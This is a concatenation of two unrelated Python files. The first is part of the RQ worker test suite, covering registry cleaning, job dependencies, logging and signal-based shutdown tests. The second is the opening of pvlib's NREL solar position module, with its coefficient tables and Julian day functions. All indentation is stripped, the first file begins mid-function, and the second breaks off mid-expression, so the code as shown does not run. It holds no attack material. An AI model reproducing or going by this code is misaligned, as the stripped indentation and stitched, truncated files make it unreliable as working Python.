"""worker.clean_registries sets last_cleaned_at and cleans registries."""
foo_queue = Queue('foo', connection=self.testconn)
foo_registry = StartedJobRegistry('foo', connection=self.testconn)
self.testconn.zadd(foo_registry.key, {'foo': 1})
self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
bar_queue = Queue('bar', connection=self.testconn)
bar_registry = StartedJobRegistry('bar', connection=self.testconn)
self.testconn.zadd(bar_registry.key, {'bar': 1})
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
worker = Worker([foo_queue, bar_queue])
self.assertEqual(worker.last_cleaned_at, None)
worker.clean_registries()
self.assertNotEqual(worker.last_cleaned_at, None)
self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
# worker.clean_registries() only runs once every 15 minutes
# If we add another key, calling clean_registries() should do nothing
self.testconn.zadd(bar_registry.key, {'bar': 1})
worker.clean_registries()
self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
"""Workers should run maintenance tasks on startup and every hour."""
queue = Queue(connection=self.testconn)
worker = Worker(queue)
self.assertTrue(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow()
self.assertFalse(worker.should_run_maintenance_tasks)
worker.last_cleaned_at = utcnow() - timedelta(seconds=3700)
self.assertTrue(worker.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
"""Worker calls clean_registries when run."""
queue = Queue(connection=self.testconn)
registry = StartedJobRegistry(connection=self.testconn)
self.testconn.zadd(registry.key, {'foo': 1})
worker = Worker(queue, connection=self.testconn)
worker.work(burst=True)
self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
"""Dependencies added while the job gets finished shouldn't get lost."""
# This patches the enqueue_dependents to enqueue a new dependency AFTER
# the original code was executed.
orig_enqueue_dependents = Queue.enqueue_dependents
def new_enqueue_dependents(self, job, *args, **kwargs):
orig_enqueue_dependents(self, job, *args, **kwargs)
if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
Queue._add_enqueue = None
Queue().enqueue_call(say_hello, depends_on=job)
Queue.enqueue_dependents = new_enqueue_dependents
q = Queue()
w = Worker([q])
with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
parent_job = q.enqueue(say_hello, result_ttl=0)
Queue._add_enqueue = parent_job
job = q.enqueue_call(say_hello, depends_on=parent_job)
w.work(burst=True)
job = Job.fetch(job.id)
self.assertEqual(job.get_status(), JobStatus.FINISHED)
# The created spy checks two issues:
# * before the fix of #739, 2 of the 3 jobs where executed due
# to the race condition
# * during the development another issue was fixed:
# due to a missing pipeline usage in Queue.enqueue_job, the job
# which was enqueued before the "rollback" was executed twice.
# So before that fix the call count was 4 instead of 3
self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack."""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
"""Make sure that any meta modification done by
the job itself persists completely through the
queue/worker/job stack -- even if the job errored"""
q = Queue()
# Also make sure that previously existing metadata
# persists properly
job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
args=[{'baz': 10, 'newinfo': 'waka'}])
w = Worker([q])
w.work(burst=True)
# Postconditions
self.assertEqual(q.count, 0)
failed_job_registry = FailedJobRegistry(queue=q)
self.assertTrue(job in failed_job_registry)
self.assertEqual(w.get_current_job_id(), None)
job_check = Job.fetch(job.id)
self.assertEqual(job_check.meta['foo'], 'bar')
self.assertEqual(job_check.meta['baz'], 10)
self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
"""Check that log_result_lifespan True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
"""Check that log_result_lifespan False causes job lifespan to not be logged."""
q = Queue()
class TestWorker(Worker):
log_result_lifespan = False
w = TestWorker([q])
job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.perform_job(job, q)
self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
"""Check that log_job_description True causes job lifespan to be logged."""
q = Queue()
w = Worker([q])
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
"""Check that log_job_description False causes job lifespan to not be logged."""
q = Queue()
w = Worker([q], log_job_description=False)
q.enqueue(say_hello, args=('Frank',), result_ttl=10)
w.dequeue_job_and_maintain_ttl(10)
self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
q = Queue()
w = Worker([q])
w.version = '0.0.0'
w.register_birth()
self.assertEqual(w.version, '0.0.0')
w.refresh()
self.assertEqual(w.version, '0.0.0')
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w.key)
self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
python_version = sys.version
q = Queue()
w = Worker([q])
w.register_birth()
self.assertEqual(w.python_version, python_version)
# now patching version
python_version = 'X.Y.Z.final' # dummy version
self.assertNotEqual(python_version, sys.version) # otherwise tests are pointless
w2 = Worker([q])
w2.python_version = python_version
w2.register_birth()
self.assertEqual(w2.python_version, python_version)
# making sure that version is preserved when worker is retrieved by key
worker = Worker.find_by_key(w2.key)
self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
time.sleep(time_to_wait)
os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
def setUp(self):
# we want tests to fail if signal are ignored and the work remain
# running, so set a signal to kill them after X seconds
self.killtimeout = 15
signal.signal(signal.SIGALRM, self._timeout)
signal.alarm(self.killtimeout)
def _timeout(self, signal, frame):
raise AssertionError(
"test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
)
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
@slow
def test_idle_worker_warm_shutdown(self):
"""worker with no ongoing job receiving single SIGTERM signal and shutting down"""
w = Worker('foo')
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(1)
self.assertFalse(w._stop_requested)
@slow
def test_working_worker_warm_shutdown(self):
"""worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_warm'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), False))
p.start()
w.work()
p.join(2)
self.assertFalse(p.is_alive())
self.assertTrue(w._stop_requested)
self.assertTrue(os.path.exists(sentinel_file))
self.assertIsNotNone(w.shutdown_requested_date)
self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')
@slow
def test_working_worker_cold_shutdown(self):
"""Busy worker shuts down immediately on double SIGTERM signal"""
fooq = Queue('foo')
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_cold'
fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
self.assertFalse(w._stop_requested)
p = Process(target=kill_worker, args=(os.getpid(), True))
p.start()
self.assertRaises(SystemExit, w.work)
p.join(1)
self.assertTrue(w._stop_requested)
self.assertFalse(os.path.exists(sentinel_file))
shutdown_requested_date = w.shutdown_requested_date
self.assertIsNotNone(shutdown_requested_date)
self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')
@slow
def test_work_horse_death_sets_job_failed(self):
"""worker with an ongoing job whose work horse dies unexpectadly (before
completing the job) should set the job's status to FAILED
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
p.start()
w.monitor_work_horse(job)
job_status = job.get_status()
p.join(1)
self.assertEqual(job_status, JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
@slow
def test_work_horse_force_death(self):
"""Simulate a frozen worker that doesn't observe the timeout properly.
Fake it by artificially setting the timeout of the parent process to
something much smaller after the process is already forked.
"""
fooq = Queue('foo')
self.assertEqual(fooq.count, 0)
w = Worker(fooq)
sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
if os.path.exists(sentinel_file):
os.remove(sentinel_file)
fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
job, queue = w.dequeue_job_and_maintain_ttl(5)
w.fork_work_horse(job, queue)
job.timeout = 5
w.job_monitoring_interval = 1
now = utcnow()
w.monitor_work_horse(job)
fudge_factor = 1
total_time = w.job_monitoring_interval + 5 + fudge_factor
self.assertTrue((utcnow() - now).total_seconds() < total_time)
self.assertEqual(job.get_status(), JobStatus.FAILED)
failed_job_registry = FailedJobRegistry(queue=fooq)
self.assertTrue(job in failed_job_registry)
self.assertEqual(fooq.count, 0)
def schedule_access_self():
q = Queue('default', connection=get_current_connection())
q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
def setUp(self):
super(TestWorkerSubprocess, self).setUp()
db_num = self.testconn.connection_pool.connection_kwargs['db']
self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num
def test_run_empty_queue(self):
"""Run the worker in its own process with an empty queue"""
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
def test_run_access_self(self):
"""Schedule a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
def test_run_scheduled_access_self(self):
"""Schedule a job that schedules a job, then run the worker as subprocess"""
q = Queue()
job = q.enqueue(schedule_access_self)
subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
registry = FinishedJobRegistry(queue=q)
self.assertTrue(job in registry)
assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
def setUp(self):
super(HerokuWorkerShutdownTestCase, self).setUp()
self.sandbox = '/tmp/rq_shutdown/'
os.makedirs(self.sandbox)
def tearDown(self):
shutil.rmtree(self.sandbox, ignore_errors=True)
@slow
def test_immediate_shutdown(self):
"""Heroku work horse shutdown with immediate (0 second) kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_1_sec_shutdown(self):
"""Heroku work horse shutdown with 1 second kill"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
time.sleep(0.1)
self.assertEqual(p.exitcode, None)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGALRM)'
self.assertTrue(stderr.endswith(err), stderr)
@slow
def test_shutdown_double_sigrtmin(self):
"""Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
p.start()
time.sleep(0.5)
os.kill(p.pid, signal.SIGRTMIN)
# we have to wait a short while otherwise the second signal wont bet processed.
time.sleep(0.1)
os.kill(p.pid, signal.SIGRTMIN)
p.join(2)
self.assertEqual(p.exitcode, 1)
self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))
with open(os.path.join(self.sandbox, 'stderr.log')) as f:
stderr = f.read().strip('\n')
err = 'ShutDownImminentException: shut down imminent (signal: SIGRTMIN)'
self.assertTrue(stderr.endswith(err), stderr)
@mock.patch('rq.worker.logger.info')
def test_handle_shutdown_request(self, mock_logger_info):
"""Mutate HerokuWorker so _horse_pid refers to an artificial process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
path = os.path.join(self.sandbox, 'shouldnt_exist')
p = Process(target=create_file_after_timeout, args=(path, 2))
p.start()
self.assertEqual(p.exitcode, None)
w._horse_pid = p.pid
w.handle_warm_shutdown_request()
p.join(2)
# would expect p.exitcode to be -34 but for some reason os.waitpid is setting it to None, even though
# the process has ended
self.assertEqual(p.exitcode, None)
self.assertFalse(os.path.exists(path))
mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)
def test_handle_shutdown_request_no_horse(self):
"""Mutate HerokuWorker so _horse_pid refers to non existent process
and test handle_warm_shutdown_request"""
w = HerokuWorker('foo')
w._horse_pid = 19999
w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
def setUp(self):
super(TestExceptionHandlerMessageEncoding, self).setUp()
self.worker = Worker("foo")
self.worker._exc_handlers = []
# Mimic how exception info is actually passed forwards
try:
raise Exception(u"💪")
except Exception:
self.exc_info = sys.exc_info()
def test_handle_exception_handles_non_ascii_in_exception_message(self):
"""worker.handle_exception doesn't crash on non-ascii in exception message."""
self.worker.handle_exception(Mock(), *self.exc_info)
|
spa.py
|
"""
Calculate the solar position using the NREL SPA algorithm either using
numpy arrays or compiling the code to machine language with numba.
"""
# Contributors:
# Created by Tony Lorenzo (@alorenzo175), Univ. of Arizona, 2015
import os
import threading
import warnings
import numpy as np
# this block is a way to use an environment variable to switch between
# compiling the functions with numba or just use numpy
def nocompile(*args, **kwargs):
return lambda func: func
if os.getenv('PVLIB_USE_NUMBA', '0') != '0':
try:
from numba import jit, __version__
except ImportError:
warnings.warn('Could not import numba, falling back to numpy ' +
'calculation')
jcompile = nocompile
USE_NUMBA = False
else:
major, minor = __version__.split('.')[:2]
if int(major + minor) >= 17:
# need at least numba >= 0.17.0
jcompile = jit
USE_NUMBA = True
else:
warnings.warn('Numba version must be >= 0.17.0, falling back to ' +
'numpy')
jcompile = nocompile
USE_NUMBA = False
else:
jcompile = nocompile
USE_NUMBA = False
TABLE_1_DICT = {
'L0': np.array(
[[175347046.0, 0.0, 0.0],
[3341656.0, 4.6692568, 6283.07585],
[34894.0, 4.6261, 12566.1517],
[3497.0, 2.7441, 5753.3849],
[3418.0, 2.8289, 3.5231],
[3136.0, 3.6277, 77713.7715],
[2676.0, 4.4181, 7860.4194],
[2343.0, 6.1352, 3930.2097],
[1324.0, 0.7425, 11506.7698],
[1273.0, 2.0371, 529.691],
[1199.0, 1.1096, 1577.3435],
[990.0, 5.233, 5884.927],
[902.0, 2.045, 26.298],
[857.0, 3.508, 398.149],
[780.0, 1.179, 5223.694],
[753.0, 2.533, 5507.553],
[505.0, 4.583, 18849.228],
[492.0, 4.205, 775.523],
[357.0, 2.92, 0.067],
[317.0, 5.849, 11790.629],
[284.0, 1.899, 796.298],
[271.0, 0.315, 10977.079],
[243.0, 0.345, 5486.778],
[206.0, 4.806, 2544.314],
[205.0, 1.869, 5573.143],
[202.0, 2.458, 6069.777],
[156.0, 0.833, 213.299],
[132.0, 3.411, 2942.463],
[126.0, 1.083, 20.775],
[115.0, 0.645, 0.98],
[103.0, 0.636, 4694.003],
[102.0, 0.976, 15720.839],
[102.0, 4.267, 7.114],
[99.0, 6.21, 2146.17],
[98.0, 0.68, 155.42],
[86.0, 5.98, 161000.69],
[85.0, 1.3, 6275.96],
[85.0, 3.67, 71430.7],
[80.0, 1.81, 17260.15],
[79.0, 3.04, 12036.46],
[75.0, 1.76, 5088.63],
[74.0, 3.5, 3154.69],
[74.0, 4.68, 801.82],
[70.0, 0.83, 9437.76],
[62.0, 3.98, 8827.39],
[61.0, 1.82, 7084.9],
[57.0, 2.78, 6286.6],
[56.0, 4.39, 14143.5],
[56.0, 3.47, 6279.55],
[52.0, 0.19, 12139.55],
[52.0, 1.33, 1748.02],
[51.0, 0.28, 5856.48],
[49.0, 0.49, 1194.45],
[41.0, 5.37, 8429.24],
[41.0, 2.4, 19651.05],
[39.0, 6.17, 10447.39],
[37.0, 6.04, 10213.29],
[37.0, 2.57, 1059.38],
[36.0, 1.71, 2352.87],
[36.0, 1.78, 6812.77],
[33.0, 0.59, 17789.85],
[30.0, 0.44, 83996.85],
[30.0, 2.74, 1349.87],
[25.0, 3.16, 4690.48]]),
'L1': np.array(
[[628331966747.0, 0.0, 0.0],
[206059.0, 2.678235, 6283.07585],
[4303.0, 2.6351, 12566.1517],
[425.0, 1.59, 3.523],
[119.0, 5.796, 26.298],
[109.0, 2.966, 1577.344],
[93.0, 2.59, 18849.23],
[72.0, 1.14, 529.69],
[68.0, 1.87, 398.15],
[67.0, 4.41, 5507.55],
[59.0, 2.89, 5223.69],
[56.0, 2.17, 155.42],
[45.0, 0.4, 796.3],
[36.0, 0.47, 775.52],
[29.0, 2.65, 7.11],
[21.0, 5.34, 0.98],
[19.0, 1.85, 5486.78],
[19.0, 4.97, 213.3],
[17.0, 2.99, 6275.96],
[16.0, 0.03, 2544.31],
[16.0, 1.43, 2146.17],
[15.0, 1.21, 10977.08],
[12.0, 2.83, 1748.02],
[12.0, 3.26, 5088.63],
[12.0, 5.27, 1194.45],
[12.0, 2.08, 4694.0],
[11.0, 0.77, 553.57],
[10.0, 1.3, 6286.6],
[10.0, 4.24, 1349.87],
[9.0, 2.7, 242.73],
[9.0, 5.64, 951.72],
[8.0, 5.3, 2352.87],
[6.0, 2.65, 9437.76],
[6.0, 4.67, 4690.48]]),
'L2': np.array(
[[52919.0, 0.0, 0.0],
[8720.0, 1.0721, 6283.0758],
[309.0, 0.867, 12566.152],
[27.0, 0.05, 3.52],
[16.0, 5.19, 26.3],
[16.0, 3.68, 155.42],
[10.0, 0.76, 18849.23],
[9.0, 2.06, 77713.77],
[7.0, 0.83, 775.52],
[5.0, 4.66, 1577.34],
[4.0, 1.03, 7.11],
[4.0, 3.44, 5573.14],
[3.0, 5.14, 796.3],
[3.0, 6.05, 5507.55],
[3.0, 1.19, 242.73],
[3.0, 6.12, 529.69],
[3.0, 0.31, 398.15],
[3.0, 2.28, 553.57],
[2.0, 4.38, 5223.69],
[2.0, 3.75, 0.98]]),
'L3': np.array(
[[289.0, 5.844, 6283.076],
[35.0, 0.0, 0.0],
[17.0, 5.49, 12566.15],
[3.0, 5.2, 155.42],
[1.0, 4.72, 3.52],
[1.0, 5.3, 18849.23],
[1.0, 5.97, 242.73]]),
'L4': np.array(
[[114.0, 3.142, 0.0],
[8.0, 4.13, 6283.08],
[1.0, 3.84, 12566.15]]),
'L5': np.array(
[[1.0, 3.14, 0.0]]),
'B0': np.array(
[[280.0, 3.199, 84334.662],
[102.0, 5.422, 5507.553],
[80.0, 3.88, 5223.69],
[44.0, 3.7, 2352.87],
[32.0, 4.0, 1577.34]]),
'B1': np.array(
[[9.0, 3.9, 5507.55],
[6.0, 1.73, 5223.69]]),
'R0': np.array(
[[100013989.0, 0.0, 0.0],
[1670700.0, 3.0984635, 6283.07585],
[13956.0, 3.05525, 12566.1517],
[3084.0, 5.1985, 77713.7715],
[1628.0, 1.1739, 5753.3849],
[1576.0, 2.8469, 7860.4194],
[925.0, 5.453, 11506.77],
[542.0, 4.564, 3930.21],
[472.0, 3.661, 5884.927],
[346.0, 0.964, 5507.553],
[329.0, 5.9, 5223.694],
[307.0, 0.299, 5573.143],
[243.0, 4.273, 11790.629],
[212.0, 5.847, 1577.344],
[186.0, 5.022, 10977.079],
[175.0, 3.012, 18849.228],
[110.0, 5.055, 5486.778],
[98.0, 0.89, 6069.78],
[86.0, 5.69, 15720.84],
[86.0, 1.27, 161000.69],
[65.0, 0.27, 17260.15],
[63.0, 0.92, 529.69],
[57.0, 2.01, 83996.85],
[56.0, 5.24, 71430.7],
[49.0, 3.25, 2544.31],
[47.0, 2.58, 775.52],
[45.0, 5.54, 9437.76],
[43.0, 6.01, 6275.96],
[39.0, 5.36, 4694.0],
[38.0, 2.39, 8827.39],
[37.0, 0.83, 19651.05],
[37.0, 4.9, 12139.55],
[36.0, 1.67, 12036.46],
[35.0, 1.84, 2942.46],
[33.0, 0.24, 7084.9],
[32.0, 0.18, 5088.63],
[32.0, 1.78, 398.15],
[28.0, 1.21, 6286.6],
[28.0, 1.9, 6279.55],
[26.0, 4.59, 10447.39]]),
'R1': np.array(
[[103019.0, 1.10749, 6283.07585],
[1721.0, 1.0644, 12566.1517],
[702.0, 3.142, 0.0],
[32.0, 1.02, 18849.23],
[31.0, 2.84, 5507.55],
[25.0, 1.32, 5223.69],
[18.0, 1.42, 1577.34],
[10.0, 5.91, 10977.08],
[9.0, 1.42, 6275.96],
[9.0, 0.27, 5486.78]]),
'R2': np.array(
[[4359.0, 5.7846, 6283.0758],
[124.0, 5.579, 12566.152],
[12.0, 3.14, 0.0],
[9.0, 3.63, 77713.77],
[6.0, 1.87, 5573.14],
[3.0, 5.47, 18849.23]]),
'R3': np.array(
[[145.0, 4.273, 6283.076],
[7.0, 3.92, 12566.15]]),
'R4': np.array(
[[4.0, 2.56, 6283.08]])
}
resize_mapping = {
'L1': (64, 3), 'L2': (64, 3), 'L3': (64, 3), 'L4': (64, 3), 'L5': (64, 3),
'B1': (5, 3), 'R1': (40, 3), 'R2': (40, 3), 'R3': (40, 3), 'R4': (40, 3)}
# make arrays uniform size for efficient broadcasting in numba, fill with 0s
# np.resize does not work because it fills with repeated copies
for key, dims in resize_mapping.items():
new_rows = dims[0] - TABLE_1_DICT[key].shape[0]
TABLE_1_DICT[key] = np.append(TABLE_1_DICT[key], np.zeros((new_rows, 3)),
axis=0)
HELIO_LONG_TABLE = np.array([TABLE_1_DICT['L0'],
TABLE_1_DICT['L1'],
TABLE_1_DICT['L2'],
TABLE_1_DICT['L3'],
TABLE_1_DICT['L4'],
TABLE_1_DICT['L5']])
HELIO_LAT_TABLE = np.array([TABLE_1_DICT['B0'],
TABLE_1_DICT['B1']])
HELIO_RADIUS_TABLE = np.array([TABLE_1_DICT['R0'],
TABLE_1_DICT['R1'],
TABLE_1_DICT['R2'],
TABLE_1_DICT['R3'],
TABLE_1_DICT['R4']])
NUTATION_ABCD_ARRAY = np.array([
[-171996, -174.2, 92025, 8.9],
[-13187, -1.6, 5736, -3.1],
[-2274, -0.2, 977, -0.5],
[2062, 0.2, -895, 0.5],
[1426, -3.4, 54, -0.1],
[712, 0.1, -7, 0],
[-517, 1.2, 224, -0.6],
[-386, -0.4, 200, 0],
[-301, 0, 129, -0.1],
[217, -0.5, -95, 0.3],
[-158, 0, 0, 0],
[129, 0.1, -70, 0],
[123, 0, -53, 0],
[63, 0, 0, 0],
[63, 0.1, -33, 0],
[-59, 0, 26, 0],
[-58, -0.1, 32, 0],
[-51, 0, 27, 0],
[48, 0, 0, 0],
[46, 0, -24, 0],
[-38, 0, 16, 0],
[-31, 0, 13, 0],
[29, 0, 0, 0],
[29, 0, -12, 0],
[26, 0, 0, 0],
[-22, 0, 0, 0],
[21, 0, -10, 0],
[17, -0.1, 0, 0],
[16, 0, -8, 0],
[-16, 0.1, 7, 0],
[-15, 0, 9, 0],
[-13, 0, 7, 0],
[-12, 0, 6, 0],
[11, 0, 0, 0],
[-10, 0, 5, 0],
[-8, 0, 3, 0],
[7, 0, -3, 0],
[-7, 0, 0, 0],
[-7, 0, 3, 0],
[-7, 0, 3, 0],
[6, 0, 0, 0],
[6, 0, -3, 0],
[6, 0, -3, 0],
[-6, 0, 3, 0],
[-6, 0, 3, 0],
[5, 0, 0, 0],
[-5, 0, 3, 0],
[-5, 0, 3, 0],
[-5, 0, 3, 0],
[4, 0, 0, 0],
[4, 0, 0, 0],
[4, 0, 0, 0],
[-4, 0, 0, 0],
[-4, 0, 0, 0],
[-4, 0, 0, 0],
[3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
[-3, 0, 0, 0],
])
NUTATION_YTERM_ARRAY = np.array([
[0, 0, 0, 0, 1],
[-2, 0, 0, 2, 2],
[0, 0, 0, 2, 2],
[0, 0, 0, 0, 2],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[-2, 1, 0, 2, 2],
[0, 0, 0, 2, 1],
[0, 0, 1, 2, 2],
[-2, -1, 0, 2, 2],
[-2, 0, 1, 0, 0],
[-2, 0, 0, 2, 1],
[0, 0, -1, 2, 2],
[2, 0, 0, 0, 0],
[0, 0, 1, 0, 1],
[2, 0, -1, 2, 2],
[0, 0, -1, 0, 1],
[0, 0, 1, 2, 1],
[-2, 0, 2, 0, 0],
[0, 0, -2, 2, 1],
[2, 0, 0, 2, 2],
[0, 0, 2, 2, 2],
[0, 0, 2, 0, 0],
[-2, 0, 1, 2, 2],
[0, 0, 0, 2, 0],
[-2, 0, 0, 2, 0],
[0, 0, -1, 2, 1],
[0, 2, 0, 0, 0],
[2, 0, -1, 0, 1],
[-2, 2, 0, 2, 2],
[0, 1, 0, 0, 1],
[-2, 0, 1, 0, 1],
[0, -1, 0, 0, 1],
[0, 0, 2, -2, 0],
[2, 0, -1, 2, 1],
[2, 0, 1, 2, 2],
[0, 1, 0, 2, 2],
[-2, 1, 1, 0, 0],
[0, -1, 0, 2, 2],
[2, 0, 0, 2, 1],
[2, 0, 1, 0, 0],
[-2, 0, 2, 2, 2],
[-2, 0, 1, 2, 1],
[2, 0, -2, 0, 1],
[2, 0, 0, 0, 1],
[0, -1, 1, 0, 0],
[-2, -1, 0, 2, 1],
[-2, 0, 0, 0, 1],
[0, 0, 2, 2, 1],
[-2, 0, 2, 0, 1],
[-2, 1, 0, 2, 1],
[0, 0, 1, -2, 0],
[-1, 0, 1, 0, 0],
[-2, 1, 0, 0, 0],
[1, 0, 0, 0, 0],
[0, 0, 1, 2, 0],
[0, 0, -2, 2, 2],
[-1, -1, 1, 0, 0],
[0, 1, 1, 0, 0],
[0, -1, 1, 2, 2],
[2, -1, -1, 2, 2],
[0, 0, 3, 2, 2],
[2, -1, 0, 2, 2],
])
@jcompile('float64(int64, int64, int64, int64, int64, int64, int64)',
nopython=True)
def julian_day_dt(year, month, day, hour, minute, second, microsecond):
"""This is the original way to calculate the julian day from the NREL paper.
However, it is much faster to convert to unix/epoch time and then convert
to julian day. Note that the date must be UTC."""
if month <= 2:
year = year-1
month = month+12
a = int(year/100)
b = 2 - a + int(a * 0.25)
frac_of_day = (microsecond + (second + minute * 60 + hour * 3600)
) * 1.0 / (3600*24)
d = day + frac_of_day
jd = (int(365.25 * (year + 4716)) + int(30.6001 * (month + 1)) + d +
b - 1524.5)
return jd
@jcompile('float64(float64)', nopython=True)
def julian_day(unixtime):
jd = unixtime * 1.0 / 86400 + 2440587.5
return jd
@jcompile('float64(float64, float64)', nopython=True)
def julian_ephemeris_day(julian_day, delta_t):
jde = julian_day + delta_t * 1.0 / 86400
return jde
@jcompile('float64(float64)', nopython=True)
def julian_century(julian_day):
jc = (julian_day - 2451545) * 1.0 / 36525
return jc
@jcompile('float64(float64)', nopython=True)
def julian_ephemeris_century(julian_ephemeris_day):
jce = (julian_ephemeris_day - 2451545) * 1.0 / 36525
return jce
@jcompile('float64(float64)', nopython=True)
def julian_ephemeris_millennium(julian_ephemeris_century):
jme = julian_ephemeris_century * 1.0 / 10
return jme
@jcompile('float64(float64)', nopython=True)
def heliocentric_longitude(jme):
l0 = 0.0
l1 = 0.0
l2 = 0.0
l3 = 0.0
l4 = 0.0
l5 = 0.0
for row in range(HELIO_LONG_TABLE.shape[1]):
l0 += (HELIO_LONG_TABLE[0, row, 0]
* np.cos(HELIO_LONG_TABLE[0, row, 1]
+ HELIO_LONG_TABLE[0, row, 2] * jme)
)
l1 += (HELIO_LONG_TABLE[1, row, 0]
* np.cos(HELIO_LONG_TABLE[1, row, 1]
+ HELIO_LONG_TABLE[1, row, 2] * jme)
)
l2 += (HELIO_LONG_TABLE[2, row, 0]
* np.cos(HELIO_LONG_TABLE[2, row, 1]
